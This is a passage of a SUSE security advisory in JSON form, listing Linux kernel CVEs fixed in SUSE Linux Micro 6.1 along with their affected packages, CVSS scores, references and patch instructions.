"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68340",
"url": "https://www.suse.com/security/cve/CVE-2025-68340"
},
{
"category": "external",
"summary": "SUSE Bug 1255507 for CVE-2025-68340",
"url": "https://bugzilla.suse.com/1255507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68340"
},
{
"cve": "CVE-2025-68345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi()\n\nThe acpi_get_first_physical_node() function can return NULL, in which\ncase the get_device() function also returns NULL, but this value is\nthen dereferenced without checking,so add a check to prevent a crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68345",
"url": "https://www.suse.com/security/cve/CVE-2025-68345"
},
{
"category": "external",
"summary": "SUSE Bug 1255601 for CVE-2025-68345",
"url": "https://bugzilla.suse.com/1255601"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68345"
},
{
"cve": "CVE-2025-68346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68346"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: dice: fix buffer overflow in detect_stream_formats()\n\nThe function detect_stream_formats() reads the stream_count value directly\nfrom a FireWire device without validating it. This can lead to\nout-of-bounds writes when a malicious device provides a stream_count value\ngreater than MAX_STREAMS.\n\nFix by applying the same validation to both TX and RX stream counts in\ndetect_stream_formats().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68346",
"url": "https://www.suse.com/security/cve/CVE-2025-68346"
},
{
"category": "external",
"summary": "SUSE Bug 1255603 for CVE-2025-68346",
"url": "https://bugzilla.suse.com/1255603"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68346"
},
{
"cve": "CVE-2025-68347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events\n\nThe DSP event handling code in hwdep_read() could write more bytes to\nthe user buffer than requested, when a user provides a buffer smaller\nthan the event header size (8 bytes).\n\nFix by using min_t() to clamp the copy size, This ensures we never copy\nmore than the user requested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68347",
"url": "https://www.suse.com/security/cve/CVE-2025-68347"
},
{
"category": "external",
"summary": "SUSE Bug 1255706 for CVE-2025-68347",
"url": "https://bugzilla.suse.com/1255706"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68347"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix refcount leak in exfat_find\n\nFix refcount leaks in `exfat_find` related to `exfat_get_dentry_set`.\n\nFunction `exfat_get_dentry_set` would increase the reference counter of\n`es-\u003ebh` on success. Therefore, `exfat_put_dentry_set` must be called\nafter `exfat_get_dentry_set` to ensure refcount consistency. This patch\nrelocate two checks to avoid possible leaks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68351",
"url": "https://www.suse.com/security/cve/CVE-2025-68351"
},
{
"category": "external",
"summary": "SUSE Bug 1255567 for CVE-2025-68351",
"url": "https://bugzilla.suse.com/1255567"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
